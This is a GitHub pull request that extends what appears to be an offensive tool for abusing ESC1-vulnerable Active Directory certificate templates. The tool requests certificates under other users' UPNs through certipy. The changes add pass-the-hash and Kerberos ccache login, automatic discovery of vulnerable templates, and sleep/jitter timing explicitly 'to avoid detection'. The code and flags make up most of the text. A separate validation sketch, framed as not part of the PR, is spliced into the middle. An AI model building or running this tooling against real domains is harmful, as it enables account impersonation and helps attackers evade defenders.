Add Items From To-Do List#3

Open
ret2c wants to merge 2 commits into JPG0mez:main from ret2c:main

Conversation


@ret2c ret2c commented Feb 12, 2025

Hi JP, spent some downtime I had and took a shot at implementing everything you had in your To-Do list. I'm not in a position to test these updates in a lab environment sadly, but I tried to do as much fuzzing as I could.

Before you try to merge, I highly recommend you give all the options a shot in a test environment.

Support alternative authentication methods such as NTLM hashes and ccache files

Added three new options and changed --password to required=False:

@click.option('-p', '--password', help='Password', required=False, type=str)
@click.option('-H', '--hashes', help='NTLM hash in format LMHASH:NTHASH or just NTHASH', required=False, type=str)
@click.option('-k', '--kerberos', help='Flag to use Kerberos authentication with ccache file', is_flag=True, default=False)
@click.option('-ccache', help='Path to ccache file for Kerberos authentication', required=False, type=str)

Added additional logic to differentiate between the chosen authentication methods:

import subprocess

# Extract the part before the "@" symbol and convert it to lowercase
username = name.split('@')[0].lower()
domain = usernames_with_domains.get(f'{username}@{domain}')

command = [certipy_client, 'req', '-u', user, '-target-ip', target_ip,
           '-dc-ip', dc_ip, '-ca', ca, '-template', template, '-upn', name]

if password:
    command.extend(['-p', password])
elif hashes:
    command.extend(['-hashes', hashes])
elif kerberos:
    command.extend(['-k', '-ccache', ccache])

process = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)

Please test in a lab environment to ensure this runs/works properly

Automatically run "certipy find" to find and grab templates vulnerable to ESC1

I changed -template's parameter to required=False, so that if a user does not supply a known vulnerable template, it'll attempt to run the new find_vulnerable_templates() function. This function will run certipy find through subprocess and attempt to mark any templates that have ESC1 vulnerabilities. This section requires double checking in a real environment, since I don't have any Certipy output on hand to test the extrapolation with. If I need to rewrite this logic please lmk. I tried to use this site to get a feel for the output.

Add jitter and sleep options to avoid detection

I added two additional options for users:

@click.option('-s', '--sleep', help='Base sleep time between requests in seconds', required=False, type=float, default=0)
@click.option('-j', '--jitter', help='Jitter percentage (0-100)', required=False, type=float, default=0)

These options then play into this logic:

for name in tqdm(names):
    if sleep > 0:
        jitter_multiplier = 1 + (random.uniform(-jitter, jitter) / 100)
        sleep_time = sleep * jitter_multiplier
        time.sleep(sleep_time)

So with this, if a user entered the parameters of -s 2 -j 50, it would have a jitter range of -50% to +50% (mult 0.5-1.5), so the sleep time would vary between ~1-3sec.

Add type validation for all variables

Within the @click instance(s), all parameters have a type= definition. With this, I also created a new function of validate_inputs() to help try and reduce clutter within main().

ToDo Items:
1. Support alternative authentication methods such as NTLM hashes and ccache files
2. Automatically run "certipy find" to find and grab templates vulnerable to ESC1
3. Add jitter and sleep options to avoid detection
4. Add type validation for all variables
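An input-validation sketch in the spirit of the validate_inputs() function and the timing options described in this PR, added here as an illustrative example rather than code from the PR itself. The function names, the empty-LM placeholder used when only an NT hash is given, and the "exactly one of -p/-H/-k" rule are my assumptions about the intended behaviour.

```python
import re

HEX32 = re.compile(r'^[0-9a-fA-F]{32}$')
# Well-known hash of an empty LM password; used when the caller passes only NTHASH
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'


def parse_ntlm_hashes(hashes: str) -> tuple[str, str]:
    """Accept 'LMHASH:NTHASH' or just 'NTHASH'; return (lmhash, nthash) lowercased."""
    parts = hashes.strip().split(':')
    if len(parts) == 1:
        lm, nt = EMPTY_LM, parts[0]
    elif len(parts) == 2:
        lm, nt = parts
        lm = lm or EMPTY_LM          # allow the ':NTHASH' shorthand
    else:
        raise ValueError('expected LMHASH:NTHASH or NTHASH')
    if not (HEX32.match(lm) and HEX32.match(nt)):
        raise ValueError('each hash must be exactly 32 hex characters')
    return lm.lower(), nt.lower()


def select_auth(password=None, hashes=None, kerberos=False, ccache=None) -> str:
    """Return the single authentication method chosen; reject ambiguous or incomplete combos."""
    chosen = [name for name, flag in (('password', password),
                                      ('hashes', hashes),
                                      ('kerberos', kerberos)) if flag]
    if len(chosen) != 1:
        raise ValueError(f'exactly one of -p/-H/-k is required, got {chosen or "none"}')
    if chosen[0] == 'hashes':
        parse_ntlm_hashes(hashes)     # fail early on a malformed -H value
    if chosen[0] == 'kerberos' and not ccache:
        raise ValueError('-k requires -ccache')
    return chosen[0]


def sleep_bounds(sleep: float, jitter: float) -> tuple[float, float]:
    """Min/max delay produced by sleep * (1 + uniform(-jitter, jitter) / 100)."""
    if sleep < 0:
        raise ValueError('sleep must be >= 0')
    if not 0 <= jitter <= 100:
        raise ValueError('jitter must be between 0 and 100')
    return sleep * (1 - jitter / 100), sleep * (1 + jitter / 100)
```

sleep_bounds(2, 50) reproduces the -s 2 -j 50 case from the description, a delay between 1.0 and 3.0 seconds.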

ret2c commented Feb 12, 2025

Also changed the README.md to include updated output, and removed the ToDo section.
